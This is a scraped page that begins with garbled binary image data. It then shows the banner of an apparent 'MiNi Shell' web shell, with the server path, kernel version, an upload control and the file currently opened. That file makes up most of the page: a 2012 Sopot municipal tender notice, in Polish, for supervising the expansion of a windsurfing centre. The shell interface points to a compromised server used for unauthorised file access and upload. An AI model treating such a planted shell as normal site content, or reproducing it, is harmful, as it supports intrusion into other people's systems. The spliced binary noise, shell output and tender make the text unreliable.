JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120326/93962-N-2012.html

<p class="kh_header"><b>Sopot: Usługa Nadzoru Inwestorskiego nad  inwestycją pn. Rozbudowa Centrum Windsurfingu przy ul Bitwy pod Płowcami w Sopocie</b><br>
<b>Numer ogłoszenia: 93962 - 2012; data zamieszczenia: 26.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Sopotu , ul. Tadeusza Kościuszki 25/27, 81-704 Sopot, woj. pomorskie, tel. 058 5213750, faks 058 5510133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sopot.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa Nadzoru Inwestorskiego nad  inwestycją pn. Rozbudowa Centrum Windsurfingu przy ul Bitwy pod Płowcami w Sopocie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest nadzór inwestorski nad realizacją inwestycji pn Rozbudowa Centrum Windsurfingu w Sopocie przy ul Bitwy pod Płowcami w Sopocie. 
Zakres robót budowlanych wykonywanych w ramach niniejszej inwestycji:
1)Budowa Budynku Ratownictwa Wodnego B1 realizowanego w ramach Rozbudowy Centrum Windsurfingu 
2)Budowa Budynku Szkolenia Żeglarskiego B2 realizowanego w ramach Rozbudowy Centrum Windsurfingu 
3)Budowa Budynku Rozwoju Motorycznego B3 realizowanego w ramach Rozbudowy Centrum Windsurfingu w Sopocie
4)Roboty zewnętrzne: mała architektura, drogi, zieleń
5)Roboty zewnętrzne: dolne źródło ciepła, przyłącze solanki, regulacja i opomiarowanie, instalacje zewnętrzne (elektr, teletechn., sanit)
6)Adaptacja budynku po obecnej siedzibie WOPR na terenie Sopockiego Klubu Żeglarskiego
7)Rekonstrukcja otworu studziennego nr 1-  dolnego źródła pompy ciepła
8)Ogrzewanie rezerwowe cwu i co budynku SKŻ
9)Poszerzenie wejścia na plażę nr 38 i likwidacja wejścia nr 39, przebudowa alejki nadmorskiej  w rejonie wejścia nr 38.
2.Zakres obowiązków wykonawcy obejmuje pełnienie usługi nadzoru inwestorskiego nad inwestycją Rozbudowa Centrum Windsurfingu, przy ul Bitwy pod Płowcami w Sopocie, koordynację i nadzór inwestorski nad robotami trwającymi, do odbioru końcowego i rozliczenia inwestycji oraz przeglądy obiektów w okresie gwarancji udzielonej przez wykonawcę robót budowlanych.
3.Czynności związane z nadzorem inwestorskim będą wykonywane zgodnie z obowiązującymi przepisami prawnymi, a w szczególności z Ustawą Prawo budowlane z dna 7 lipca 1994 r. (Dz.U.2006.156.1118 z późn.zm.). 
4.Zadanie inwestycyjne realizowane będzie na podstawie dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych, wykonanych przez: Małgorzatę Kruszko-Szotyńską Pracownia Projektowa, ul. Zamenhofa 27, 80-284 Gdańsk.
5.Kod Wspólnego Słownika Zamówień (CPV):  71521000-6 Usługi nadzorowania placu budowy.
6.Wykonawcą robót  jest firma budowlana BUDREM-RYBAK sp. z  o. o., sp. komandytowa,   ul. Krótka 1, 84 - 242 Luzino.
7.  Szczegółowy zakres obowiązków inspektorów nadzoru
1) zapoznanie się z dokumentacją projektową budowy i związanymi z nią decyzjami i uzgodnieniami  oraz z treścią umowy pomiędzy Zamawiającym - inwestorem   a Wykonawcą robót budowlanych
2) przedłożenie w dniu podpisania umowy oświadczeń inspektorów nadzoru, potwierdzających przyjęcie przez nich obowiązków oraz kopii dokumentów, potwierdzających posiadanie przez inspektorów nadzoru wymaganych uprawnień oraz ich przynależność do właściwej izby zawodowej. 
4) tałe konsultowanie i fachowe doradzanie na rzecz Zamawiającego
5) sprawowanie kontroli nad zgodnością realizacji budowy z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej
6) sprawowanie kontroli nad zgodnością realizacji budowy z postanowieniami umowy zawartej pomiędzy Zamawiającym a wykonawcą robót
7) kontrola jakości wykonywanych robót, wyrobów budowlanych oraz dostaw przewidzianych  w dokumentacji projektowej, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie
8) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, w terminie 4 dni roboczych od daty otrzymania zgłoszenia o gotowości do odbioru
9) sprawdzanie dokumentów jakości, aprobat, deklaracji zgodności, atestów, instrukcji obsługi i innych dokumentów dotyczących wbudowywanych materiałów, wyrobów i urządzeń
10) uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych
11) informowanie Zamawiającego o konieczności przeprowadzenia badań jakości wykonanych robót lub wbudowanych materiałów i zainstalowanych urządzeń
12) w przypadku stosowania rozwiązań zamiennych ocenianie prawidłowość przyjmowanych do realizacji rozwiązań
13) w przypadku odkrycia na terenie budowy obiektów archeologicznych lub niewypałów, nadzorowanie ich prawidłowego zabezpieczenia oraz niezwłoczne poinformowanie o tym fakcie Zamawiającego i właściwych służb;
14) w porozumieniu z Zamawiającym, zawiadamianie właściwego organ nadzoru budowlanego o wypadkach naruszenia ustawy Prawo budowlane, dotyczących bezpieczeństwa budowy i ochrony środowiska, a także o rażących nieprawidłowościach lub uchybieniach
technicznych;
15) kontrola zgodności terminów realizacji robót w stosunku do terminów określonych w harmonogramie rzeczowo-terminowo-finansowym;
16) dostarczenie wszelkich informacji związanych z postępem prac, niezbędnych dla prawidłowego rozliczenia przez Gminę (Zamawiającego) środków pochodzących z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007 - 2013 oraz ze środków Funduszu Rozwoju Kultury Fizycznej;
17) niezwłoczne zawiadamianie Zamawiającego o przerwach w realizacji robót;
18)	składanie pisemnych raportów Zamawiającemu o stanie zaawansowania robót na koniec okresów rozliczeniowych, określonych w harmonogramie rzeczowo-terminowo- finansowym;
19)	niezwłoczne informowanie Zamawiającego o wystąpieniu okoliczności, które mogą wpłynąć na opóźnienie terminów wykonania robót;
20)	sprawdzanie protokołów odbioru robót w toku wystawianych przez Wykonawcę, ze szczególnym uwzględnieniem ilości i wartości robót oraz zgodności protokołów z harmonogramem rzeczowo-finansowym; protokoły należy sprawdzić w terminie 3 dni od daty przedłożenia ich przez wykonawcę robót budowlanych;
21)	przekazywanie Zamawiającemu w wyznaczonych przez niego terminach informacji na potrzeby sprawozdawczości i kontroli;
22)	sprawdzanie kosztorysów dotyczących robót zamiennych;
23)	niezwłoczne zawiadamianie Zamawiającego o stwierdzonych w trakcie realizacji robót wadach dokumentacji projektowej, oraz współpraca z projektantami w tym zakresie;
24)	kontrolowanie przestrzegania na budowie zasad bezpieczeństwa i higieny pracy oraz utrzymywania porządku na budowie, a w przypadku prowadzenia prac z naruszeniem przepisów bezpieczeństwa wstrzymanie robót i niezwłocznie powiadomienie Zamawiającego o wstrzymaniu robót;
25)	kontrolowanie sposobu składowania i przechowywania materiałów, wyrobów oraz urządzeń;
26)	wstrzymanie robót prowadzonych z naruszeniem zasad bezpieczeństwa, a także w sposób niezgodny  z postanowieniami umowy zawartej pomiędzy Zamawiającym a wykonawcą robót budowlanych; w takim przypadku należy niezwłocznie zawiadomić Zamawiającego o wstrzymaniu robót;
27)	niezwłoczne informowanie Zamawiającego o konieczności wykonania robót zamiennych, a także sprawdzanie i opiniowanie wniosków Wykonawcy robót o wykonanie robót zamiennych;
28)	kontroli prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego przebiegu procesu budowlanego oraz wyceny robót,
29)	organizowanie narad technicznych z udziałem uczestników procesu inwestycyjnego raz w tygodniu  oraz pełna dyspozycyjność, obecność na budowie zapewniająca pełnienie bieżącego nadzoru inwestorskiego  i na każde wezwanie Zamawiającego i Wykonawcy robót;
30)	każdorazowe potwierdzanie w dzienniku budowy: obecności na budowie, uwag dotyczących realizacji budowy mających znaczenie dla oceny jakości i stopnia zaawansowania robót,
31)	kontrola czy Wykonawcy zawarł umowę z każdym podwykonawcą wprowadzanym na budowę,  czy jest to zgodnie z warunkami umowy z Zamawiającym, i czy umowa ta została zaakceptowana przez Zamawiającego
32)	kontrola sporządzanych przez Wykonawcę robót zestawień materiałów, wyrobów i urządzeń przeznaczonych do wbudowania;
33)	kontrola pod względem kompletności i treści dokumentów przedstawianych przez Wykonawcę  przy odbiorach częściowych oraz przy odbiorze końcowym;
34)	weryfikacja i zatwierdzenie dokumentacji powykonawczej;
35)	potwierdzanie protokolarne faktycznie wykonanych robót;
36)	zorganizowanie i udział w czynnościach odbiorów częściowych oraz w czynnościach odbioru końcowego. Czynności odbioru częściowego należy rozpocząć nie później niż w terminie 7 dni od daty zgłoszenia przez Wykonawcę gotowości do odbioru. Czynności odbioru częściowego należy zakończyć w terminie 7 dni od daty ich rozpoczęcia. Czynności odbioru końcowego należy rozpocząć w terminie 7 dni od daty przekazania Zamawiającemu przez wykonawcę robót dokumentów odbioru końcowego. Czynności odbioru końcowego należy zakończyć w terminie 10 dni od daty ich rozpoczęcia;
37)	udział w czynnościach przekazywania gotowego obiektu do użytkowania;
38)	informowanie Zamawiającego o zmianie osób, które sprawują nadzór nad realizacją robót;
39)	po zakończeniu budowy, w terminie 8 tygodni od daty podpisania bezusterkowego protokołu końcowego odbioru robót, rozliczenie inwestycji oraz sporządzenie dokumentów przekazania-przejęcia (PT i OT);
40)	opracowanie i dostarczenie instrukcji użytkowania budynków oraz instrukcji bezpieczeństwa pożarowego z planem ewakuacji, o którym mowa w § 6 rozporządzenia Ministra Spraw Wewnętrznych  i Administracji z dnia 7 czerwca 2010 w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (Dz. U. Nr 109 poz. 719)
41)	przekazanie Zamawiającemu zweryfikowanego kompletu dokumentacji powykonawczej  wraz z protokołami, atestami i innymi dokumentami oraz wykonanie instrukcji bezpieczeństwa pożarowego dla całości obiektu wraz z planem rozmieszczenia hydrantów, gaśnic oraz znaków ewakuacji
42)	sporządzenie ostatecznego rozliczenia finansowego zadania w układzie uzgodnionym z Zamawiającym;
43)	udział w komisyjnym określeniu stanu zaawansowania robót oraz sprawdzanie rozliczeń budowy w przypadku, gdy Zamawiający lub Wykonawca robót odstąpią od umowy na wykonanie robót
44)niezwłoczne informowanie Zamawiającego o wszelkich zmianach swojego statusu prawnego, a także o wszczęciu postępowania upadłościowego lub likwidacyjnego oraz o każdej zmianie adresu swojej siedziby,
45)	zapewnienie zaplecza biurowego dla zespołu inspektorów nadzoru inwestorkiego we własnym zakresie;
46)kontrola jakość robót po usunięciu przez Wykonawcę wad i usterek stwierdzonych w trakcie odbiorów oraz potwierdzanie usunięcia wad i usterek;
47)egzekwowanie od Wykonawcy robót budowlanych usunięcia wad ujawnionych przez użytkowników w okresie gwarancji.
48)udział w przeglądach technicznych przy udziale Zamawiającego i użytkowników  w okresie gwarancji. 
8. Termin realizacji zamówienia:
1)Wykonawca będzie pełnić usługę nadzoru inwestorskiego przez cały okres realizacji budowy tj. od dnia  podpisania umowy do dnia podpisania bezusterkowego protokołu końcowego odbioru robót budowlanych przez Zamawiającego, uzyskania przez Zamawiającego  pozwolenia na użytkowanie oraz dostarczenia przez Wykonawcę wymaganych umową dokumentów rozliczeniowych inwestycji.
2)Przewidywany czas realizacji inwestycji- luty 2013 r. W przypadku skrócenia lub wydłużenia tego okresu, wynagrodzenie Wykonawcy określone w § 7 ust. 1 umowy nie ulegnie zmianie.
3)Okres gwarancji udzielonej przez wykonawcę robót budowlanych Zamawiającemu wynosi 60 miesięcy od dnia  odbioru końcowego robót budowlanych
9. Zamawiający wymaga od Wykonawcy udzielenia 60 miesięcznej rękojmi od daty podpisania bezusterkowego protokołu końcowego odbioru robót budowlanych przez ZAMAWIAJĄCEGO.
Projekt jest współfinansowany w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007 - 2013 oraz ze środków Funduszu Rozwoju Kultury Fizycznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy wymaga wniesienia przed terminem składania ofert wadium w wysokości 2.000 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby wykonawca ubiegający się o udzielenie zamówienia wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę polegającą na pełnieniu nadzoru inwestorskiego nad co najmniej  jedną robotą budowlaną obejmującą swoim zakresem budowę co najmniej jednego budynku użyteczności publicznej o kubaturze nie mniejszej niż 2.000 m3 . Przyjmuje się definicję budynku użyteczności publicznej podaną w § 3 pkt 6 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U.02.75.690 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca oświadczy, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia:         
a)  osobą, która będzie pełnić funkcję kierownika zespołu inspektorów nadzoru inwestorskiego posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz co najmniej 5 letnie doświadczenie w pełnieniu funkcji inspektora nadzoru nad inwestycjami budowlanymi i minimum 5 letnie doświadczenie w kierowaniu zespołem ludzkim;
    b) osobą, która będzie pełnić funkcję inspektora nadzoru w branży sanitarnej, posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, oraz co najmniej 5 letnie doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego lub kierownika budowy bądź robót;
c) osobą, która będzie pełnić funkcję inspektora nadzoru w branży elektrycznej, posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, oraz co najmniej 5 letnie doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego lub kierownika budowy bądź robót;
d) osobą, która będzie pełnić funkcję inspektora nadzoru w branży telekomunikacyjnej, posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności telekomunikacyjnej bez ograniczeń, oraz co najmniej 5 letnie doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego lub kierownika budowy bądź robót;
 e) osobą, która będzie pełnić funkcję inspektora nadzoru w branży drogowej, 
     posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń, oraz co najmniej 5 letnie doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego lub kierownika budowy bądź robót;
f)  osobą, która będzie pełnić funkcję specjalista ds. rozliczeń:  posiadającej co najmniej 5-letnie doświadczenie zawodowe w zakresie zarządzania finansami i rozliczania inwestycji budowlanych, 

Zamawiający dopuszcza połączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.
Zamawiający w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im
uprawnienia wydane obywatelom Państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo Budowlane (Dz. U. z 2006 r. Nr 156 poz. 1118 z p. zm. ) oraz ustawy o zasadach kwalifikacji zawodowych nabytych w państwach członkowskich UE (Dz. U. z 2008 Nr 63 poz. 394 z p. zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Zamawiający wymaga złożenia wraz z ofertą: 1)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia należy złożyć dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego; 2)W przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru - pełnomocnictwo (a)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>ZAMAWIAJĄCY przewiduje możliwość dokonania następujących zmian postanowień umowy w stosunku do treści oferty WYKONAWCY:
1)	zmiana kwoty wynagrodzenia brutto WYKONAWCY, jeżeli w okresie realizacji umowy zmieni się obowiązująca stawka podatku VAT;
2)	zastąpienie osób wymienionych w § 2 ust. 1 niniejszej umowy, innymi osobami, posiadającymi wymagane doświadczenie i kwalifikacje na następujących zasadach:
a) WYKONAWCA z własnej inicjatywy proponuje zmianę wyżej wskazanych osób w przypadku:
-śmierci, choroby lub innych zdarzeń losowych;
-jeżeli zmiana tych osób stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od WYKONAWCY;
b) ZAMAWIAJĄCY może zażądać od WYKONAWCY zmiany wyżej wskazanych osób jeżeli uzna, że nie wykonują należycie swoich obowiązków. WYKONAWCA obowiązany jest dokonać zmiany tych osób w terminie nie dłuższym niż 14 dni od daty złożenia wniosku przez ZAMAWIAJĄCEGO.
3)	zmiana formy zabezpieczenia należytego wykonania umowy;
4)	zmiana WYKONAWCY robót budowlanych wskazanego w § 1 ust. 3 niniejszej umowy;
5)	aktualizacja danych ZAMAWIAJĄCEGO i WYKONAWCY w przypadku zmiany tych danych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umsopot.nv.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać w siedzibie Zamawiającego w pok. 101 w godz. 8:00 - 15:30, lub zostanie przesłana pocztą.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2012 godzina 11:00, miejsce: Kancelaria Ogólna Urzędu Miasta Sopotu, ul. Kościuszki 25/27, 81-704 Sopot, pok. 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1)Otwarcie ofert jest jawne i nastąpi 03.04.2012 r. o godz. 11:30 w siedzibie Zamawiającego: Urząd Miasta Sopotu, ul. Kościuszki 23/25, 81-704 Sopot, pok. 36 (I p.); 2)Numer referencyjny nadany przez Zamawiającego: ZP.271.11.2012.AG 3)Wykonawcom, a także innym podmiotom, jeżeli mają oni lub mieli interes prawny w uzyskaniu danego zamówienia oraz ponieśli lub mogą ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy Prawo zamówień publicznych, przysługują środki ochrony prawnej przewidziane w dziale VI ustawy P.z.p.
